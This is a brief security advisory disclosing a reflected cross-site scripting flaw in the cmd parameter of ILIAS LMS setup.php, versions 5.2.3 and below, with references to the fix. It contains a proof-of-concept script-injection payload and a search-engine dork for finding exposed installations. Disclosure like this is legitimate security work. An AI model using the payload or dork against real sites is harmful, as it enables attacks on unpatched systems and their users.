ILIAS CMS versions 5.2.3 and below suffer from a cross site scripting vulnerability.
c9a8e18c5fc3b7b6fc07c6a03891a012----------------------------
Product & Service Introduction:
ILIAS is a web base learning management system (LMS, VLE). Features:
Courses, SCORM 1.2 and 2004, mail, forum, chat, groups, podcast, file
sharing, authoring, CMS, test, wiki, personal desktop, LOM, LDAP, role
based access.
(Copy of the Homepage: http://sourceforge.net/projects/ilias/ )
----------------------------
Severity Level: Medium
----------------------------
Description:
An Cross Site Scripting vulnerability has been discovered at ILIAS CMS that
affected all versions till 5.2.3. This vulnerability has been fixed in
version 5.2.4. Vulnerability affects the parameter cmd at Setup section
which leaded to alert.
----------------------------
Proof of Concept (PoC):
Vulnerability was found at :
/ilias/setup/setup.php
Parameter Affected:
- cmd
Vulnerability affected at :
/ilias/setup/setup.php?cmd={inject-here}
Payload used:
"><script>alert(1)</script>
Dork: inurl:/setup/setup.php?cmd=
-----------------------------
References:
https://www.ilias.de/docu/goto_docu_pg_75029_35.html
https://github.com/ILIAS-eLearning/ILIAS/commit/c0f326d05231072e33679b84835c03d5043255cb
Credits & Authors: Florian Kunushevci
----------------------------